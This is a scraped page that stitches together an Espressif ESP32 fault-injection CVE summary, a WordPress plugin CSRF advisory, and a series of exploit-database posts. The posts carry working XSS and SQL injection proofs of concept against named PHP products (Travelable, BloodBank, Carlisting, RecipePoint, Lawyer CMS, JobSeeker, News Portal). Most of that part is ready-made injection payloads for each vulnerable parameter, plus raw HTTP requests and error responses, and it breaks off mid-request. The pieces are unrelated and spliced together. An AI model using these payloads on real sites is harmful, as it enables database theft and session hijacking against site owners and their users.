An issue was discovered on Espressif ESP32 3.0 (ESP32_rev300 ROM) devices. An EMFI attack on ECO3 provides the attacker with a capability to influence the PC value at the CPU context level, regardless of Secure Boot and Flash Encryption status. By using this capability, the attacker can exploit another behavior in the chip to gain unauthorized access to the ROM download mode. Access to ROM download mode may be further exploited to read the encrypted flash content in cleartext format or execute stub code.

**Developer Zone**

**Hardware**

Espressif drives AIoT development with complete MCU based solutions with integrated Wi-Fi and Bluetooth connectivity.

Learn More

**Software**

We offer an easy-to-use and efficient development platform for AIoT applications.

Learn More

**Documents**

View and download Espressif’s technical documents.

Learn More

**At Espressif,** not only do we design powerful AIoT chips, but we also design their operating systems and application frameworks. In doing so, we also support our customers, all the way from design to certification and manufacturing. By choosing us, you get to concentrate on your design, and bring your product to life quickly, efficiently and at no extra cost.

 

**We’re Hiring!**

Espressif is committed to technological innovation for the benefit of both our society and the planet. We are looking for people with a unique blend of creativity, dedication and technological acumen. Join us so we can build an AIoT world together!

Open Positions

**Latest Updates**

*   The Espressif Thread Border Router is now officially recognised as a Thread-...
    
*   CoreS3 is a third-generation device in M5Stack’s Core development kit series,...
    
*   The JRC Board is one of the latest ESP32-based dev boards for IoT development...
    
*   Put together by Magicbit Academy, this Udemy course will teach you how to build...
    
*   Adding Golioth’s device management features to an existing ESP-IDF project is a...
    
*   Espressif Webinars will be launched on 13 Apr., with a presentation on esptools.
    
*   With the help of ESP32-S3, the Plumerai AI software provides masterful deep-...
    
*   Espressif and the National University of Singapore have recently co-organised a...
    
*   Espressif Systems will be an official exhibitor at Embedded World 2023, between...
    
*   Independent maker Philippe Cadic has created a smart watch based on Espressif’s...
    
*   Espressif’s ESP32-C6 is now available on the market. ESP-IDF v5.1, currently in...
    
*   Build your Matter devices with ease using Espressif SoCs (the entire ESP32, and...

CVE-2023-35818: Wi-Fi & Bluetooth MCUs and AIoT Solutions I Espressif Systems

Cross-Site Request Forgery (CSRF) vulnerability in Etoile Web Design Front End Users plugin <= 3.2.24 versions.

**Solution**

 Fixed

Update the WordPress Front End Users plugin to the latest available version (at least 3.2.25).

Found this useful? Thank thiennv for reporting this vulnerability. Buy a coffee ☕

thiennv discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress Front End Users Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. This vulnerability has been fixed in version 3.2.25.

**Other vulnerabilities in this plugin**

 0 present

 2 patched

View all

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-34005: WordPress Front End Users plugin <= 3.2.24 - Cross Site Request Forgery (CSRF) vulnerability - Patchstack

Travelable version 1.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Travelable 1.0 - Stored XSS# Exploit Author: CraCkEr# Date: 15/07/2023# Vendor: travelmate.com# Vendor Homepage: https://www.codester.com/items/43963/travelable-trek-management-solution# Software Link: https://travel.codeswithbipin.com/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site## DescriptionAllow Attacker to inject malicious code into website, give ability to steal sensitiveinformation, manipulate data, and launch additional attacks.Path: /[random-number]/commentPOST parameter 'comment' is vulnerable to XSS-----------------------------------------------------------POST /[random-number]/comment HTTP/2_token=10Mh1zuuVXB1iH3QsrEOqpWGOXogEv38WPwqGtv6&name=cracker+infosec&email=cracker%40infosec.com&phone=%2B96171951951&comment=[XSS Payload]-----------------------------------------------------------## Steps to Reproduce:1. Surf as a (Guest User)2. Go to [Tour Packages] on this Path: https://website/packages3. Choose any package and click [Explore] Path: https://website/package/64. Scroll Down to the [Comments] section5. Inject your XSS Payload in [Comment Box]6. Click on [Submit]7. Every visitor to the page where you inject your [XSS Payload] - Path: https://website/package/68. XSS will fire and execute on his browser.[-] Done

Travelable 1.0 Cross Site Scripting

BloodBank version 1.1 suffers from a cross site scripting vulnerability.

    # Exploit Title: BloodBank 1.1 - Reflected XSS# Exploit Author: CraCkEr# Date: 15/07/2023# Vendor: phpscriptpoint# Vendor Homepage: https://phpscriptpoint.com/# Software Link: https://demo.phpscriptpoint.com/bloodbank/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /bloodbank/page.phpURL parameter is vulnerable to RXSShttps://website/bloodbank/page.php/jr88z"><script>alert(1)</script>h6n9w?slug=blog&page=2[-] Done

BloodBank 1.1 Cross Site Scripting

Carlisting version 1.6 suffers from a cross site scripting vulnerability.

    # Exploit Title: Carlisting 1.6 - Reflected XSS# Exploit Author: CraCkEr# Date: 16/07/2023# Vendor: phpscriptpoint# Vendor Homepage: https://phpscriptpoint.com/# Software Link: https://demo.phpscriptpoint.com/carlisting/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /carlisting/search.phpGET parameter 'country' is vulnerable to RXSSGET parameter 'state' is vulnerable to RXSSGET parameter 'city' is vulnerable to RXSShttps://website/carlisting/search.php?brand_id=1&model_id=1&car_condition=New%20Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200&country=[XSS]&state=[XSS]&city=[XSS][-] Done

Carlisting 1.6 Cross Site Scripting

Carlisting version 1.6 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Carlisting 1.6 - SQL Injection# Exploit Author: CraCkEr# Date: 16/07/2023# Vendor: phpscriptpoint# Vendor Homepage: https://phpscriptpoint.com/# Software Link: https://demo.phpscriptpoint.com/carlisting/# Tested on: Windows 10 Pro# Impact: Database Access## DescriptionSQL injection attacks can allow unauthorized access to sensitive data, modification ofdata and crash the application or make it unavailable, leading to lost revenue anddamage to a company's reputation.Path: /carlisting/search.phpGET parameter 'brand_id' is vulnerable to SQL InjectionGET parameter 'model_id' is vulnerable to SQL InjectionGET parameter 'car_condition' is vulnerable to SQL InjectionGET parameter 'car_category_id' is vulnerable to SQL InjectionGET parameter 'body_type_id' is vulnerable to SQL InjectionGET parameter 'fuel_type_id' is vulnerable to SQL InjectionGET parameter 'transmission_type_id' is vulnerable to SQL InjectionGET parameter 'year' is vulnerable to SQL InjectionGET parameter 'mileage_start' is vulnerable to SQL InjectionGET parameter 'mileage_end' is vulnerable to SQL InjectionGET parameter 'country' is vulnerable to SQL InjectionGET parameter 'state' is vulnerable to SQL InjectionGET parameter 'city' is vulnerable to SQL Injectionhttps://website/carlisting/search.php?brand_id=[SQLI]&model_id=[SQLI]&car_condition=[SQLI]&price_range=1&car_category_id=[SQLI]&body_type_id=[SQLI]&fuel_type_id=[SQLI]&transmission_type_id=[SQLI]&year=[SQLI]&mileage_start=[SQLI]&mileage_end=[SQLI]&country=[SQLI]&state=[SQLI]&city=[SQLI]---Parameter: brand_id (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: brand_id=1 AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200&country=USA&state=CA&city=LosParameter: model_id (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: brand_id=1&model_id=1 AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200&country=USA&state=CA&city=LosParameter: car_condition (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: brand_id=1&model_id=1&car_condition=New Car' AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200&country=USA&state=CA&city=LosParameter: car_category_id (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1 AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200&country=USA&state=CA&city=LosParameter: body_type_id (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1 AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200&country=USA&state=CA&city=LosParameter: fuel_type_id (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1 AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200&country=USA&state=CA&city=LosParameter: transmission_type_id (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2 AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&year=2023&mileage_start=10&mileage_end=200&country=USA&state=CA&city=LosParameter: year (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023 AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&mileage_start=10&mileage_end=200&country=USA&state=CA&city=LosParameter: mileage_start (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10) AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&mileage_end=200&country=USA&state=CA&city=LosParameter: mileage_end (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200) AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&country=USA&state=CA&city=LosParameter: country (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200&country=USA' AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&state=CA&city=LosParameter: state (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200&country=USA&state=CA' AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&city=LosParameter: city (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200&country=USA&state=CA&city=Los' AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW---[-] Done

Carlisting 1.6 SQL Injection

RecipePoint version 1.9 suffers from a remote SQL injection vulnerability.

# Exploit Title: RecipePoint 1.9 - SQL Injection  
# Exploit Author: CraCkEr  
# Date: 15/07/2023  
# Vendor: phpscriptpoint  
# Vendor Homepage: https://phpscriptpoint.com/  
# Software Link: https://demo.phpscriptpoint.com/recipepoint/  
# Tested on: Windows 10 Pro  
# Impact: Database Access

## Description

SQL injection attacks can allow unauthorized access to sensitive data, modification of  
data and crash the application or make it unavailable, leading to lost revenue and  
damage to a company's reputation.

Path: /recipepoint/recipe-result

GET parameter 'text' is vulnerable to SQL Injection  
GET parameter 'category' is vulnerable to SQL Injection  
GET parameter 'type' is vulnerable to SQL Injection  
GET parameter 'difficulty' is vulnerable to SQL Injection  
GET parameter 'cuisine' is vulnerable to SQL Injection  
GET parameter 'cooking_method' is vulnerable to SQL Injection

https://website/recipepoint/recipe-result?text=[SQLI]&category=[SQLI]&type=[SQLI]&difficulty=[SQLI]&cuisine=[SQLI]&cooking_method=[SQLI]

---  
Parameter: text (GET)  
    Type: error-based  
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)  
    Payload: text=") AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&category=7&type=Free&difficulty=Beginner&cuisine=2&cooking_method=1

    Type: boolean-based blind  
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)  
    Payload: text=") OR NOT 07033=7033-- wXyW&category=7&type=Free&difficulty=Beginner&cuisine=2&cooking_method=1

Parameter: category (GET)  
    Type: time-based blind  
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
    Payload: text=&category=(SELECT(0)FROM(SELECT(SLEEP(9)))a)&type=Free&difficulty=Beginner&cuisine=2&cooking_method=1

Parameter: type (GET)  
    Type: time-based blind  
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
    Payload: text=&category=7&type=Free"XOR(SELECT(0)FROM(SELECT(SLEEP(9)))a)XOR"Z&difficulty=Beginner&cuisine=2&cooking_method=1

Parameter: difficulty (GET)  
    Type: time-based blind  
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
    Payload: text=&category=7&type=Free&difficulty=Beginner"XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR"Z&cuisine=2&cooking_method=1

Parameter: cuisine (GET)  
    Type: time-based blind  
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
    Payload: text=&category=7&type=Free&difficulty=Beginner&cuisine=(SELECT(0)FROM(SELECT(SLEEP(8)))a)&cooking_method=1

Parameter: cooking_method (GET)  
    Type: time-based blind  
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
    Payload: text=&category=7&type=Free&difficulty=Beginner&cuisine=2&cooking_method=(SELECT(0)FROM(SELECT(SLEEP(5)))a)  
---

[-] Done

RecipePoint 1.9 SQL Injection

Lawyer CMS version 1.6 suffers from a cross site scripting vulnerability.

    # Exploit Title: Lawyer CMS 1.6 - Reflected XSS# Exploit Author: CraCkEr# Date: 16/07/2023# Vendor: phpscriptpoint# Vendor Homepage: https://phpscriptpoint.com/# Software Link: https://demo.phpscriptpoint.com/lawyer/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /lawyer/page.phpURL parameter is vulnerable to RXSShttps://website/lawyer/page.php/[XSS]?slug=blog&page=2Path: /lawyer/search.phpURL parameter is vulnerable to RXSShttps://website/lawyer/search.php/[XSS]?search_string=&page=2[-] Done

Lawyer CMS 1.6 Cross Site Scripting

JobSeeker version 1.5 suffers from a cross site scripting vulnerability.

    # Exploit Title: JobSeeker 1.5 - Reflected XSS# Exploit Author: CraCkEr# Date: 15/07/2023# Vendor: phpscriptpoint# Vendor Homepage: https://phpscriptpoint.com/# Software Link: https://demo.phpscriptpoint.com/jobseeker/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /jobseeker/search-result.phpGET parameter 'kw' is vulnerable to RXSSGET parameter 'lc' is vulnerable to RXSSGET parameter 'ct' is vulnerable to RXSSGET parameter 'cp' is vulnerable to RXSSGET parameter 'p' is vulnerable to RXSShttps://website/jobseeker/search-result.php?kw=[XSS]&lc=[XSS]&ct=[XSS]&cp=[XSS]&p=[XSS][-] Done

JobSeeker 1.5 Cross Site Scripting

News Portal version 4.0 suffers from a remote SQL injection vulnerability.

# Exploit Title: News Portal v4.0 - SQL Injection (Unauthorized)# Date: 09/07/2023# Exploit Author: Hubert Wojciechowski# Contact Author: hub.woj12345@gmail.com# Vendor Homepage: https://phpgurukul.com/news-portal-project-in-php-and-mysql/c# Software Link: https://phpgurukul.com/?sdm_process_download=1&download_id=7643# Version: 4.0# We are looking for work security engineer, security administrator: https://www.pracuj.pl/praca/security-engineer-warszawa-plocka-9-11,oferta,1002635314# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23## Example  1-----------------------------------------------------------------------------------------------------------------------Param: name, email, comment-----------------------------------------------------------------------------------------------------------------------Req-----------------------------------------------------------------------------------------------------------------------POST /newsportal/news-details.php?nid=13 HTTP/1.1Origin: http://127.0.0.1Sec-Fetch-User: ?1Host: 127.0.0.1:80Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7Accept-Encoding: gzip, deflateSec-Fetch-Site: same-originsec-ch-ua-mobile: ?0Content-Length: 277Sec-Fetch-Mode: navigateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36Connection: closeReferer: http://127.0.0.1/newsportal/news-details.php?nid=13Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua-platform: "Windows"Cache-Control: max-age=0Content-Type: application/x-www-form-urlencodedsec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"Sec-Fetch-Dest: documentcsrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=(SELECT%20(CASE%20WHEN%20(8137%3d6474)%20THEN%200x73647361646173646173%20ELSE%20(SELECT%206474%20UNION%20SELECT%201005)%20END))''&email=admin%40local.host&comment=ssssssssssssssssssssssssss&submit-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sun, 09 Jul 2023 10:55:26 GMTServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17X-Powered-By: PHP/8.1.17Set-Cookie: PHPSESSID=l7dg3s1in50ojjigs4vm2p0r9s; path=/Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 146161<script>alert('comment successfully submit. Comment will be display after admin review ');</script><!DOCTYPE html><html lang="en">  <head>    <meta charset="utf-8">    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">    <meta name="description" content="">    <meta name="author" content="">    <title>News Portal | Home Page  [...]-----------------------------------------------------------------------------------------------------------------------Req-----------------------------------------------------------------------------------------------------------------------POST /newsportal/news-details.php?nid=13 HTTP/1.1Origin: http://127.0.0.1Sec-Fetch-User: ?1Host: 127.0.0.1:80Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7Accept-Encoding: gzip, deflateSec-Fetch-Site: same-originsec-ch-ua-mobile: ?0Content-Length: 276Sec-Fetch-Mode: navigateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36Connection: closeReferer: http://127.0.0.1/newsportal/news-details.php?nid=13Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua-platform: "Windows"Cache-Control: max-age=0Content-Type: application/x-www-form-urlencodedsec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"Sec-Fetch-Dest: documentcsrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=(SELECT%20(CASE%20WHEN%20(8137%3d6474)%20THEN%200x73647361646173646173%20ELSE%20(SELECT%206474%20UNION%20SELECT%201005)%20END))'&email=admin%40local.host&comment=ssssssssssssssssssssssssss&submit-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sun, 09 Jul 2023 10:56:06 GMTServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17X-Powered-By: PHP/8.1.17Set-Cookie: PHPSESSID=fcju4nb9mr2tu80mqv5cnduldk; path=/Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Length: 525Connection: closeContent-Type: text/html; charset=UTF-8<br /><b>Fatal error</b>:  Uncaught mysqli_sql_exception: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'admin@local.host','ssssssssssssssssssssssssss','0')' at line 1 in C:\xampp3\htdocs\newsportal\news-details.php:21Stack trace:#0 C:\xampp3\htdocs\newsportal\news-details.php(21): mysqli_query(Object(mysqli), 'insert into tbl...')#1 {main}  thrown in <b>C:\xampp3\htdocs\newsportal\news-details.php</b> on line <b>21</b><br />w-----------------------------------------------------------------------------------------------------------------------SQLMap example param 'comment':-----------------------------------------------------------------------------------------------------------------------sqlmap identified the following injection point(s) with a total of 450 HTTP(s) requests:---Parameter: #2* ((custom) POST)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause    Payload: csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=sdsadasdas&email=admin@local.host&comment=ssssssssssssssssssssssssss' RLIKE (SELECT (CASE WHEN (3649=3649) THEN 0x7373737373737373737373737373737373737373737373737373 ELSE 0x28 END)) AND 'xRsB'='xRsB&submit=    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=sdsadasdas&email=admin@local.host&comment=ssssssssssssssssssssssssss' OR (SELECT 6120 FROM(SELECT COUNT(*),CONCAT(0x71787a7671,(SELECT (ELT(6120=6120,1))),0x7170717071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'odEK'='odEK&submit=    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=sdsadasdas&email=admin@local.host&comment=ssssssssssssssssssssssssss' AND (SELECT 1610 FROM (SELECT(SLEEP(5)))mZUx) AND 'bjco'='bjco&submit=---web application technology: PHP 8.1.17, Apache 2.4.56bacck-end DBMS: MySQL >= 5.0 (MariaDB fork)## Example 2 - login to administration panel-----------------------------------------------------------------------------------------------------------------------Param: username-----------------------------------------------------------------------------------------------------------------------Req-----------------------------------------------------------------------------------------------------------------------POST /newsportal/admin/ HTTP/1.1Host: 127.0.0.1Content-Length: 42Cache-Control: max-age=0sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: http://127.0.0.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://127.0.0.1/newsportal/admin/Accept-Encoding: gzip, deflateAccept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7Cookie: USERSUB_TYPE=0; IS_MODERATOR=0; REPLY_SORT_ORDER=ASC; SHOWTIMELOG=Yes; user_uniq_agent=95e1b7d0ab9086d6b88e9adfaacf07d887164827a5708adf; SES_ROLE=3; USER_UNIQ=117b06da2ff9aabad1a916992e92bb26; USERTYP=3; USERTZ=33; helpdesk_uniq_agent=%7B%22temp_name%22%3A%22test%22%2C%22email%22%3A%22test%40local.host%22%7D; CPUID=8dba9a451f44121c45180df414ab6917; DEFAULT_PAGE=dashboard; CURRENT_FILTER=cases; currency=USD; phpsessid-9795-sid=s7b0dqlpebu74ls14j61e5q3be; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; WBCELastConnectJS=1688869781; PHPSESSID=2vag12caoqvv76avbeslm65je8Connection: closeusername=admin'&password=Test%40123&login=-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sun, 09 Jul 2023 11:00:53 GMTServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17X-Powered-By: PHP/8.1.17Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Length: 505Connection: closeContent-Type: text/html; charset=UTF-8<br /><b>Fatal error</b>:  Uncaught mysqli_sql_exception: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'f925916e2754e5e03f75dd58a5733251')' at line 1 in C:\xampp3\htdocs\newsportal\admin\index.php:13Stack trace:#0 C:\xampp3\htdocs\newsportal\admin\index.php(13): mysqli_query(Object(mysqli), 'SELECT AdminUse...')#1 {main}  thrown in <b>C:\xampp3\htdocs\newsportal\admin\index.php</b> on line <b>13</b><br />-----------------------------------------------------------------------------------------------------------------------Req-----------------------------------------------------------------------------------------------------------------------POST /newsportal/admin/ HTTP/1.1Host: 127.0.0.1Content-Length: 43Cache-Control: max-age=0sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: http://127.0.0.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36Accept: 